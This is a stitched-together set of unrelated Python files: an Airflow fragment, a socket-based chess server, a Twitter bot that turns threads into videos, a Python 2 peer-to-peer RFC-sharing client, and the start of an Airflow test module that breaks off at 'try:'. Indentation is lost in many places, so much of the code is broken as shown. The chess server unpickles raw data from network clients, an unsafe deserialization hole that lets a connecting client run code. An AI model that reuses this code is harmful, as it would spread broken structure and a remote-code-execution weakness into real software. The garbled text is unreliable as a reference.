# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
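# Illustrative sketch (not part of Airflow): the set arithmetic that
# prepare_file_path_queue() above uses to decide which files to queue next,
# reduced to plain data.
def _example_queue_filtering():
    all_files = {"a.py", "b.py", "c.py", "d.py"}
    in_progress = {"a.py"}            # currently being parsed
    recently_processed = {"b.py"}     # parsed within min_file_process_interval
    at_run_limit = {"c.py"}           # already parsed max_runs times
    to_queue = all_files - in_progress - recently_processed - at_run_limit
    return to_queue  # {"d.py"}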
|
server.py
|
import socket ## used for connecting users together ##
import threading ## used to manage each user in a separate thread ##
import pickle # used to transfer data across the internet, similar to JSON ##
from chess.layoutBoardObject import Board ## used to get Board class to get an object and save each game in a list ##
# used for server side of chess
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDRESS = (SERVER, PORT)
FORMAT = "utf-8"
DISCONNECT_MESSAGE = "!DISCONNECT"
totalConn = 0
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Found in TechWithTim game tutorial
try:
server.bind(ADDRESS)
except socket.error as e:
    print(str(e))
# This will store all games, first term = game number, second = actual board
allChessGames = {}
def handle_client(conn, address, chessGame, gameNumber):
global totalConn
print(f"NEW CONNECTION {address}")
    # decide this player's colour: an even connection count gets white
colourId = "b"
if totalConn % 2 == 0:
colourId = "w"
# send what colour the player is
conn.send(colourId.encode(FORMAT))
# send board across socket by using pickle to "dump" it
boardString = pickle.dumps(chessGame)
conn.send(boardString)
totalConn += 1
connected = True
while connected:
d = conn.recv(1024)
try:
data = d.decode("utf-8")
except UnicodeDecodeError:
print(f"Bytes data = {d}")
print(f"Length of data = {len(d)}")
print(pickle.loads(d))
if not d:
break
if data == "":
continue
if data != "GetBoardPosition":
print(f"[DATA] = {data}")
if "Move" in data:
# for moving pieces
# "Move row column mousePos[0] mousePos[1]"
fullData = data.split(" ")
prevRow = int(fullData[1])
prevCol = int(fullData[2])
mousePosOne = int(fullData[3])
mousePosTwo = int(fullData[4])
mousePos = (mousePosOne, mousePosTwo)
print(fullData, mousePosOne // 70, (mousePosTwo - 110) // 70)
playerMoved = chessGame.movePossible(mousePos, prevCol, prevRow)
playerMoved = str(playerMoved)
conn.sendall(playerMoved.encode(FORMAT))
elif "GetPossibleMoves" in data:
# return the possible moves
possibleMoves = chessGame.possible
possibleMoves = pickle.dumps(possibleMoves)
conn.sendall(possibleMoves)
elif "GetBoardObject" in data:
# return the current board object
data = pickle.dumps(chessGame)
conn.sendall(data)
elif "SetPossible" in data:
# send message to confirm
conn.send("y".encode(FORMAT))
# Set the possible moves
print("[RECEIVED] Set Possible received")
possibleMoves = conn.recv(1024)
possibleMoves = pickle.loads(possibleMoves)
print(possibleMoves)
chessGame.possible = possibleMoves
elif "GetBoardPosition" in data:
# Return current board position
boardPosition = chessGame.board
boardPosition = pickle.dumps(boardPosition)
conn.sendall(boardPosition)
elif "CheckOtherPlayer" in data:
# Return if the player with the black pieces is in the game
# check if the total number of connections are even or odd
otherPlayer = False
if totalConn % 2 == 0:
otherPlayer = True
            conn.send(str(otherPlayer).encode(FORMAT))
totalConn -= 1
conn.close()
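# Hedged client-side sketch (not part of this server module): how a client would
# complete the handshake implemented in handle_client() above -- receive its
# colour, then unpickle the Board object the server sends. A real client should
# keep reading until the whole pickle payload has arrived.
def _example_client_handshake(host=SERVER, port=PORT):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    colour = client.recv(1).decode(FORMAT)   # "w" or "b"
    board = pickle.loads(client.recv(4096))  # Board object dumped by the server
    return colour, board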
def start():
global totalConn
server.listen()
print("[LISTENING] on " + SERVER)
while True:
conn, address = server.accept()
print("[CONNECTED] PLAYER JOINED")
totalConn = threading.activeCount() - 1
# check if there is another game with only one player
if totalConn % 2 == 0:
# if not, add a new chess game to all chess games dictionary
chessGame = Board()
allChessGames[totalConn] = chessGame
else:
# chess game is the newest on the dictionary
chessGame = allChessGames[totalConn - 1]
thread = threading.Thread(target=handle_client, args=(conn, address, chessGame, totalConn))
thread.start()
print(f" \nACTIVE CONNECTIONS: {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
main.py
|
from datetime import datetime, timezone
import sys
import json
from update_queue_lenght import update_queue_length
sys.path.append('./objection_engine')
sys.path.append('./video-splitter')
from collections import Counter
import tweepy
import re
import time
import os
from persistqueue import Queue
import threading
import random
import settings
from hatesonar import Sonar
from better_profanity import profanity
from comment_list_brige import Comment
from objection_engine import render_comment_list, is_music_available, get_all_music_available
from cacheout import LRUCache
splitter = __import__("ffmpeg-split")
sonar = Sonar()
mention_queue = Queue('queue')
delete_queue = Queue('delete')
profanity.load_censor_words_from_file('banlist.txt')
available_songs = get_all_music_available()
cache = LRUCache()
def filter_beginning_mentions(match):
mentions = match[0].strip().split(' ')
index = next((index for index,x in enumerate(mentions) if x in mentions[:index]), len(mentions))
message = ' '.join(mentions[index:])
return message + ' ' if len(message) > 0 else message
def sanitize_tweet(tweet, previous_tweet):
user_mentions = set()
if previous_tweet is not None:
user_mentions.update(mention["screen_name"] for mention in previous_tweet.entities["user_mentions"])
user_mentions.add(previous_tweet.user.screen_name)
mentions_pattern = "|".join(user_mentions)
tweet.full_text = re.sub(f'^(@({mentions_pattern}) )+', filter_beginning_mentions, tweet.full_text)
tweet.full_text = re.sub(r'(https)\S*', '(link)', tweet.full_text)
sonar_prediction = sonar.ping(tweet.full_text)
    hate_classification = next((x for x in sonar_prediction['classes'] if x['class_name'] == 'hate_speech'), None)
    if hate_classification is None:
        return False
    if hate_classification["confidence"] > 0.6:
        tweet.full_text = '...'
    tweet.full_text = profanity.censor(tweet.full_text)
    return hate_classification["confidence"] > 0.8
def update_id(id):
with open('id.txt', 'w') as idFile:
idFile.write(id)
def postVideoTweet(reply_id, filename):
uploaded_media = api.media_upload(filename, media_category='TWEET_VIDEO')
while (uploaded_media.processing_info['state'] == 'pending'):
time.sleep(uploaded_media.processing_info['check_after_secs'])
uploaded_media = api.get_media_upload_status(uploaded_media.media_id_string)
time.sleep(10)
return api.update_status('Your video is ready. Do you want it removed? contact @/LuisMayoV', in_reply_to_status_id=reply_id, auto_populate_reply_metadata = True, media_ids=[uploaded_media.media_id_string])
def check_mentions():
global lastId
global mention_queue
global render_regex
while True:
try:
mentions = api.mentions_timeline(count='200', tweet_mode="extended") if lastId == None else api.mentions_timeline(since_id=lastId, count='200', tweet_mode="extended")
if len(mentions) > 0:
lastId = mentions[0].id_str
for tweet in mentions[::-1]:
if re.search(render_regex, tweet.full_text) is not None:
mention_queue.put(tweet)
print(mention_queue.qsize())
if 'delete' in tweet.full_text:
delete_queue.put(tweet)
update_id(lastId)
except Exception as e:
print(e)
time.sleep(20)
def process_deletions():
global delete_queue
def process_tweets():
global mention_queue
global update_queue_params
global me
while True:
try:
tweet = mention_queue.get()
update_queue_params['last_time'] = tweet.created_at
thread = []
current_tweet = tweet
previous_tweet = None
            # The cache key consists of the tweet ID and the selected music
cache_key = None
if 'music=' in tweet.full_text:
music_tweet = tweet.full_text.split('music=', 1)[1][:3]
else:
music_tweet = 'PWR'
if current_tweet is not None and (current_tweet.in_reply_to_status_id_str or hasattr(current_tweet, 'quoted_status_id_str')):
cache_key = (current_tweet.in_reply_to_status_id_str or current_tweet.quoted_status_id_str) + '/' + music_tweet.lower()
cached_value = cache.get(cache_key)
            if not is_music_available(music_tweet):  # If the music argument is misspelled, reply with the accepted values
try:
                    api.update_status('The music argument format is incorrect. The possibilities are: \n' + '\n'.join(available_songs), in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata=True)
except Exception as musicerror:
print(musicerror)
elif cached_value is not None:
api.update_status('I\'ve already done that, here you have ' + cached_value, in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
else:
i = 0
                # If we get 2 hate-speech detections we stop rendering the video altogether
hate_detections = 0
                # In the case of quotes I have to check for the attribute's presence instead of whether it's None, because Twitter API designers felt creative that week
while (current_tweet is not None) and (current_tweet.in_reply_to_status_id_str or hasattr(current_tweet, 'quoted_status_id_str')):
try:
current_tweet = previous_tweet or api.get_status(current_tweet.in_reply_to_status_id_str or current_tweet.quoted_status_id_str, tweet_mode="extended")
if current_tweet.in_reply_to_status_id_str or hasattr(current_tweet, 'quoted_status_id_str'):
previous_tweet = api.get_status(current_tweet.in_reply_to_status_id_str or current_tweet.quoted_status_id_str, tweet_mode="extended")
else:
previous_tweet = None
# Refusing to render zone
if re.search(render_regex, current_tweet.full_text) is not None and any(user['id_str'] == me for user in current_tweet.entities['user_mentions']):
break
if sanitize_tweet(current_tweet, previous_tweet):
hate_detections += 1
if hate_detections >= 2:
api.update_status('I\'m sorry. The thread may contain unwanted topics and I refuse to render them.', in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
clean(thread, None, [])
thread = []
break
# End of refusing to render zone
thread.insert(0, Comment(current_tweet).to_message())
i += 1
if (current_tweet is not None and i >= settings.MAX_TWEETS_PER_THREAD):
current_tweet = None
api.update_status(f'Sorry, the thread was too long, I\'ve only retrieved {i} tweets', in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except tweepy.error.TweepError as e:
try:
api.update_status('I\'m sorry. I wasn\'t able to retrieve the full thread. Deleted tweets or private accounts may exist', in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except Exception as second_error:
print (second_error)
current_tweet = None
if (len(thread) >= 1):
output_filename = tweet.id_str + '.mp4'
render_comment_list(thread, music_code= music_tweet, output_filename=output_filename)
                files = splitter.split_by_seconds(output_filename, 140, vcodec='libx264')  # split into 140-second chunks to fit Twitter's video length limit
reply_to_tweet = tweet
first_tweet = True
try:
for file_name in files:
reply_to_tweet = postVideoTweet(reply_to_tweet.id_str, file_name)
if first_tweet:
cached_value = f'https://twitter.com/{me_response.screen_name}/status/{reply_to_tweet.id_str}'
cache.add(cache_key, cached_value)
first_tweet = False
except tweepy.error.TweepError as e:
limit = False
try:
print(e.api_code)
if (e.api_code == 185):
print("I'm Rated-limited :(")
limit = True
mention_queue.put(tweet)
time.sleep(900)
except Exception as parsexc:
print(parsexc)
try:
if not limit:
api.update_status(str(e), in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except Exception as second_error:
print(second_error)
print(e)
clean(thread, output_filename, files)
time.sleep(1)
except Exception as e:
clean(thread, None, [])
print(e)
def clean(thread, output_filename, files):
global mention_queue
    # Mark the task as done so persistqueue removes the element from the on-disk queue
mention_queue.task_done()
try:
for comment in thread:
if (hasattr(comment, 'evidence') and comment.evidence is not None):
os.remove(comment.evidence)
except Exception as second_e:
print(second_e)
try:
for file_name in files:
os.remove(file_name)
except Exception as second_e:
print(second_e)
try:
if output_filename is not None:
os.remove(output_filename)
except Exception as second_e:
print(second_e)
################################## Main
# Load keys
with open('keys.json', 'r') as keyfile:
keys = json.load(keyfile)
# Load last ID
try:
with open('id.txt', 'r') as idFile:
lastId = idFile.read()
except FileNotFoundError:
lastId = None
# Init
auth = tweepy.OAuthHandler(keys['consumerApiKey'], keys['consumerApiSecret'])
auth.set_access_token(keys['accessToken'], keys['accessTokenSecret'])
api = tweepy.API(auth)
me_response = api.me()
# render_regex = f'^ *@{me_response.screen_name} render'
render_regex = 'render'
me = me_response.id_str
update_queue_params = {
'queue': mention_queue,
'last_time': None,
'api': api
}
producer = threading.Thread(target=check_mentions)
consumer = threading.Thread(target=process_tweets)
# threading.Thread(target=process_tweets).start()
threading.Thread(target=update_queue_length, args=[update_queue_params]).start()
producer.start()
consumer.start()
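# Design note: check_mentions is the producer that pushes matching mentions into the persistent
# on-disk queue, and process_tweets is the consumer that renders and replies. Because persistqueue
# only discards an item once task_done() is called (which happens in clean()), a mention that was
# fetched but never acknowledged should reappear in the queue after a restart.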
|
peer2_ks.py
|
import os
import platform
import shlex
import time
import re
import socket
import threading
OS = platform.system()
HOST = socket.gethostbyname(socket.gethostname())
RFC_Server_Port = 40004
RFC_Fetching_List = [8130,8131]
FilePath = ''
cookieNumval = None
SERVER_NAME = '10.154.0.185'
SERVER_PORT = 65423
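# Overview of this peer's configuration: it registers with the registration server (RS) at
# SERVER_NAME:SERVER_PORT, serves its own RFCs to other peers on RFC_Server_Port, and tries to
# download every RFC number listed in RFC_Fetching_List; FilePath and cookieNumval are filled in
# later by main().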
class Peer_Addition: # Linked-list node holding one peer's registration record; the fields below become its attributes
def __init__(self, hostname, cookieNum, activeFlag, ttl, port, actvcnt, recentlyactv, next_entry=None):
self.hostname = hostname
self.cookieNum = cookieNum
self.activeFlag = activeFlag
self.TTL = int(ttl)
self.list_port = int(port)
self.ActvCnt = int(actvcnt)
self.RecentlyActv = recentlyactv
self.next_entry = next_entry
    def get_next(self): # Getters and setters for all the attributes of Peer_Addition
return self.next_entry
def get_hostname(self):
return self.hostname
def get_cookieNum(self):
return self.cookieNum
def get_activeFlag(self):
return self.activeFlag
def get_TTL(self):
return self.TTL
def get_list_port(self):
return self.list_port
def get_ActvCnt(self):
return self.ActvCnt
def get_RecentlyActv(self):
return self.RecentlyActv
def set_next(self, new_next):
self.next_entry = new_next
def set_hostname(self, hostname):
self.hostname = hostname
def set_list_port(self, port):
self.list_port = port
def set_cookieNum(self, cookieNumNo):
self.cookieNum = cookieNumNo
def set_activeFlag(self, activeFlag):
self.activeFlag = activeFlag
def set_TTL(self, ttl):
self.TTL = ttl
    def set_ActvCnt(self, actvcnt):
        self.ActvCnt = actvcnt
    def set_RecentlyActv(self, recentlyactv):
        self.RecentlyActv = recentlyactv
class Peer_Index(): # Singly linked list of Peer_Addition entries; used to add, update and look up peer records (e.g. a listening port)
def __init__(self, head=None):
self.head = head
def get_head(self):
return self.head
def set_head(self, head):
self.head = head
def CreateEntry(self, hostname, cookieNum, activeFlag, ttl, port, actvcnt, recentlyactv): #method to create an entry within a Peer_Index
new_entry = Peer_Addition(hostname, cookieNum, activeFlag, ttl, port, actvcnt, recentlyactv)
new_entry.set_next(self.head)
self.head = new_entry
def GetPort(self, hostname): # Fetching the port number from the Peer Index
current = self.head
while current != None:
if current.hostname == hostname:
return current.get_list_port()
current = current.get_next()
print "ERROR! There is no port associated with %s\n" % (hostname)
def Display(self): # To display the PI table
current = self.head
print "Peer-Index:--->"
print "Hostname\tcookieNum\tActive Flag\tTTL\tListening Port\tRegistration count\tRecent Registration time\n"
while current != None:
print "%s\t%s\t%s\t%d\t%d\t\t%d\t\t%s" % (
current.hostname, current.cookieNum, current.activeFlag, current.TTL, current.list_port, current.ActvCnt,
current.RecentlyActv)
current = current.next_entry
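# Note: Peer_Index above and RFC_Index below are both singly linked lists that insert new entries
# at the head, so the most recently created record is always the first one visited by the
# traversal loops in GetPort, Display and the search methods.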
class RFC_Addition(): # Object to initialize RFC Entry
def __init__(self, RFCno=0, RFCtitle='', hostname=socket.gethostbyname(socket.gethostname()), ttl=7200,
next_entry=None):
self.RFCno = str(RFCno)
self.RFCtitle = str(RFCtitle)
self.hostname = str(hostname)
self.TTL = int(ttl)
self.next_entry = next_entry
def get_next(self):
return self.next_entry
def get_RFCno(self):
return self.RFCno
def get_RFCtitle(self):
return self.RFCtitle
def get_hostname(self):
return self.hostname
def get_TTL(self):
return self.TTL
def set_next(self, new_next):
self.next_entry = new_next
def set_TTL(self, ttl):
self.TTL = ttl
class RFC_Index(): # Singly linked list of RFC_Addition entries; supports creating, merging and searching RFC records
def __init__(self, head=None):
self.head = head
def get_head(self):
return self.head
def CreateEntry(self, RFCno, RFCtitle, hostname, ttl):
new_entry = RFC_Addition(RFCno, RFCtitle, hostname, ttl)
new_entry.set_next(self.head)
self.head = new_entry
    def LocalRFC_Search(self, RFCno): # Before contacting the RS for the active peer index, check whether the RFC is already present locally
global HOST
current = self.head
while current != None:
if current.hostname == HOST:
if current.RFCno == str(RFCno):
print "RFC %d is already present on the local system\n" % (RFCno)
return True
current = current.next_entry
print "Contacting RS server for obtaining RFC %d......\n" % (RFCno)
return False
def Check_DuplicateEntry(self, RFCno, hostname): # To Check for duplicate entry before appending peer RFC Index to local Index
current = self.head
while current != None:
if current.RFCno == str(RFCno) and current.hostname == hostname:
return True
else:
current = current.next_entry
return False
def SearchRFC_Index(self, RFCno): # To search the merged RFC-Index for the required RFC
current = self.head
status = False
print "Searching Merged RFC-Index....\n"
while current != None:
if current.hostname != HOST:
if current.RFCno == str(RFCno):
status = True
return (status, current.hostname)
current = current.next_entry
print " RFC %d is not found !\n" % (RFCno)
return (status, None)
    def UpdateRFC_List(self): # Serialize the most recently added entry (the list head) as one line for the local RFC_Index.txt file
current = self.head
entry = str(current.get_RFCno()) + "\t" + str(current.get_RFCtitle()) + "\t" + str(
current.get_hostname()) + "\t" + str(current.get_TTL()) + "\n"
return entry
def display(self):
current = self.head
print "RFC-Index\n"
while current != None:
print "%s\t%s\t%s\t%d" % (current.RFCno, current.RFCtitle, current.hostname, current.TTL)
current = current.next_entry
def GenerateIndex_Response(self): # To send across the whole RFC-Index
global HOST
global OS
current = self.head
message = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "P2P-DI/1.0 200 OK Host:" + HOST + "OS:" + OS
while current != None:
data = str(current.get_RFCno()) + '(%^&***)' + str(current.get_RFCtitle()) + '(%^&***)' + str(
current.get_hostname()) + '(%^&***)' + str(current.get_TTL())
message = message + "(%^&***)" + data
print "...\n"
current = current.next_entry
return message
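# Every request and response in this file is a plain string whose fields are joined with the
# literal delimiter "(%^&***)". The two helpers below are only an illustrative sketch of that
# framing (they are not used anywhere in the original code and their names are invented here).
def build_p2p_message(*fields): # e.g. build_p2p_message("GET", "RFC-INDEX", "P2P-DI/1.0") -> "GET(%^&***)RFC-INDEX(%^&***)P2P-DI/1.0"
    return "(%^&***)".join(str(field) for field in fields)
def parse_p2p_message(message): # split a received message back into its list of fields
    return message.split("(%^&***)")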
def Get_LocalFile_List(): # To obtain list of RFCs already present on localhost
global FilePath
files = []
count = 0
for file in os.listdir(FilePath):
if file.startswith("8"):
count += 1
files.append(os.path.splitext(file)[0])
return (files, count)
def Get_FileTitle(): # To obtain RFC titles of local RFCs (the text between the year token "2017" and "Abstract" in each RFC header)
global FilePath
title = []
start = 0
end = 0
for file in os.listdir(FilePath):
if file.startswith("8"):
f = open(file, "r")
content = f.read()
f.close()
contents = str(content)
            c = re.split(r'(\W+)', contents) # split the text into word/non-word tokens so the title span can be located
elem = 0
count = 0
for elem in c:
if elem == "2017":
start = count
break
count += 1
elem = 0
count = 0
for elem in c:
if elem == "Abstract":
end = count
break
count += 1
hd = ''
for elem in range(start + 1, end):
hd = hd + " " + c[elem]
title.append(hd)
return title
def ServerMain(socket, addr, object): # Serves one peer connection (GET RFC-INDEX / GET RFC); note that the 'socket' parameter is the accepted connection and shadows the socket module inside this function
global FilePath
global HOST
global OS
msg = socket.recv(1024)
message = str.split(msg, "(%^&***)")
if message[0] == 'GET':
if message[1] == 'RFC-INDEX':
print "Sending RFC-INDEX to %s.....\n" % (str(addr))
response = object.GenerateIndex_Response()
socket.send(response)
print "Finished sending RFC-Index to %s\n" % (str(addr))
elif message[1] == 'RFC':
os.chdir(FilePath) # Changes CWD to 'CWD\IP_Project'
print "Sending RFC %s to %s......\n" % (message[2], str(addr))
response = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "P2P-DI/1.0 200 OK Host:" + HOST + "OS:" + OS
filename = str(message[2]) + ".txt"
if os.path.isfile(filename):
with open(filename, "r") as f:
filedata = f.read()
response = response + "(%^&***)" + filedata
socket.send(response)
print "Finished sending RFC %s to %s\n" % (message[2], str(addr))
socket.close()
def ServerModule(object): #Function implementing RFC Server socket attributes
global HOST
global RFC_Server_Port
server_socket = socket.socket()
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((HOST, RFC_Server_Port))
server_socket.listen(25)
print "Starting server.....\n"
while True:
client_socket, addr = server_socket.accept()
print "Connection from: " + str(addr)
MainThread = threading.Thread(target=ServerMain, args=(client_socket, addr, object,))
MainThread.start()
def Generate_KeepAlive(): # Sends a KEEPALIVE message to the RS every 20 seconds on a background thread
global SERVER_NAME
global SERVER_PORT
global HOST
global OS
global cookieNumval
KAsock = socket.socket()
KAsock.connect((SERVER_NAME, SERVER_PORT))
while True:
time.sleep(20)
message = "KEEPALIVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)OS:(%^&***)" + OS
print "KEEPALIVE P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "OS:" + OS
print "\nKEEP ALIVE!!!!\n"
KAsock.send(message)
KAsock.close()
def Leave_Func(): # Sends a LEAVE message so the Registration Server can mark this peer as inactive
global SERVER_NAME
global SERVER_PORT
global HOST
global OS
global cookieNumval
s = socket.socket()
s.connect((SERVER_NAME, SERVER_PORT))
message = "LEAVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)OS:(%^&***)" + OS
print "LEAVE P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "OS:" + OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Leaving the P2P network"
    return s # return the socket so main() can close it after the LEAVE exchange
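# Registration lifecycle as implemented above: main() sends REGISTER once, Generate_KeepAlive then
# repeats KEEPALIVE every 20 seconds on a background thread so the RS keeps this peer marked as
# active, and Leave_Func sends LEAVE when the user chooses to quit.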
def main():
global SERVER_NAME
global SERVER_PORT
global HOST
global RFC_Server_Port
global OS
global RFC_Fetching_List
global FilePath
global cookieNumval
wd = os.getcwd()
if OS == "Windows":
directory = wd + "\IP_Project\Client"
else:
directory = wd + "/IP_Project"
if not os.path.exists(directory):
os.makedirs(directory)
FilePath = directory
os.chdir(FilePath)
RFCtable = RFC_Index()
Peertable = Peer_Index()
f1 = open("RFC_Index.txt", "w+")
f1.write("\nRFC NUMBER\tRFC TITLE\tHOSTNAME\tTTL\n")
f1.close()
s = socket.socket()
s.connect((SERVER_NAME, SERVER_PORT))
if os.path.isfile("cookieNum.txt"):
with open("cookieNum.txt", "r") as f:
cookieNumval = f.read()
else:
cookieNumval = None
if cookieNumval != None:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)Port:(%^&***)" + str(RFC_Server_Port) + "(%^&***)OS:(%^&***)" + OS
print "REGISTER P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "Port:" + str(RFC_Server_Port) + "OS:" + OS
else:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)Port:(%^&***)" + str(
RFC_Server_Port) + "(%^&***)OS:(%^&***)" + OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Peer %s registered with RS\n" % (str(s.getsockname()))
cookieNumval = str(reply[4])
s.close()
f = open("cookieNum.txt", "w+")
f.write(cookieNumval)
f.close()
Keep_AliveThread = threading.Thread(target=Generate_KeepAlive, args=())
Keep_AliveThread.daemon = True
Keep_AliveThread.start()
(localfiles, count) = Get_LocalFile_List()
if not localfiles:
print "No RFCs on localhost\n"
else:
print 'RFCs on local system:\n'
for i in localfiles:
print i
title = Get_FileTitle()
print "Updating local RFCs to RFC-Index..\n"
for idx in range(0, count):
RFCtable.CreateEntry(localfiles[idx], title[idx], HOST, 7200)
entry = RFCtable.UpdateRFC_List()
os.chdir(FilePath)
f = open("RFC_Index.txt", "a+")
try:
f.write(entry)
finally:
f.close()
MainThread = threading.Thread(target=ServerModule, args=(RFCtable,))
MainThread.start()
time.sleep(20)
start_time_cumulative = time.time()
RFCtable.display()
for RFCno in RFC_Fetching_List:
status = RFCtable.LocalRFC_Search(RFCno)
if status == False:
start_time_each = time.time()
s = socket.socket()
s.connect((SERVER_NAME, SERVER_PORT))
message = "GET(%^&***)PEER-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)OS:(%^&***)" + OS
print "GET PEER-INDEX P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "OS:" + OS
print "Requesting Peer-Index from RS....\n"
s.send(message)
rep = s.recv(4096)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
Peertable.set_head(None) # To CHECK!!
idx = 7
while (idx < len(reply)):
Peertable.CreateEntry(reply[idx], reply[idx + 1], reply[idx + 2], reply[idx + 3], reply[idx + 4],
reply[idx + 5], reply[idx + 6])
idx = idx + 7
print "...\n"
print "Peer-Index successfully downloaded on %s\n" % (str(s.getsockname()))
elif reply[1] == "404" and reply[2] == "ERROR":
print "ERROR: %s!\n" % (str(reply[7]))
Peertable.Display()
s.close()
current = Peertable.get_head()
while current != None:
if current.hostname != HOST:
peername = current.get_hostname()
peerport = current.get_list_port()
s = socket.socket()
s.connect((peername, peerport))
message = "GET(%^&***)RFC-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "GET RFC-INDEX P2P-DI/1.0 Host:" + HOST + "OS:" + OS
print "Requesting RFC-Index from Peer %s:%s....\n" % (peername, str(peerport))
s.send(message)
rep = s.recv(4096)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
while (idx < len(reply)):
res = RFCtable.Check_DuplicateEntry(reply[idx], reply[idx + 2])
if res == False:
RFCtable.CreateEntry(reply[idx], reply[idx + 1], reply[idx + 2], reply[idx + 3])
entry = RFCtable.UpdateRFC_List()
os.chdir(FilePath)
f = open("RFC_Index.txt", "a+")
try:
f.write(entry)
finally:
f.close()
idx = idx + 4
print "...\n"
print "RFC-Index successfully downloaded on %s\n" % (str(s.getsockname()))
else:
print "ERROR while downloading RFC-Index from peer %s:%s\n" % (peername, str(peerport))
s.close()
(status, peername) = RFCtable.SearchRFC_Index(RFCno)
if status == True:
peerport = Peertable.GetPort(peername)
s = socket.socket()
s.connect((peername, peerport))
message = "GET(%^&***)RFC(%^&***)" + str(
RFCno) + "(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "GET RFC" + str(RFCno) + "P2P-DI/1.0 Host:" + HOST + "OS:" + OS
print "Requesting RFC %d from peer %s:%s..\n" % (RFCno, peername, str(peerport))
s.send(message)
rep = s.recv(204800)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
filename = str(RFCno) + ".txt"
f = open(filename, "w+")
f.write(reply[7])
f.close()
end_time_each = time.time()
print "RFC %d successfully downloaded!\n" % (RFCno)
final_time_each = end_time_each - start_time_each
f = open("Timer.txt", "a+")
try:
f.write(
"\nThe time taken for obtaining RFC " + str(RFCno) + ": " + str(final_time_each))
finally:
f.close()
s.close()
break
s.close()
current = current.get_next()
if current == None:
print "RFC %d is not present with any peer\n" % (RFCno)
end_time_cumulative = time.time()
final_time_cumulative = end_time_cumulative - start_time_cumulative
f = open("Timer.txt", "a+")
try:
f.write("\nThe cumulative time taken for obtaining all required RFCs: " + str(final_time_cumulative))
finally:
f.close()
print "\nCompleted searching for all required RFCs\n"
while True:
userinput = raw_input("Leave or stay??\n")
if userinput == "leave":
LeaveSock = Leave_Func()
break
elif userinput == "stay":
print "Waiting before closing server....\n"
time.sleep(60)
    Keep_AliveThread.join(10) # the keep-alive loop never exits on its own, so wait only briefly before shutting down
MainThread.join(10)
LeaveSock.close()
if __name__ == '__main__':
main()
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors
from airflow.models.slamiss import SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
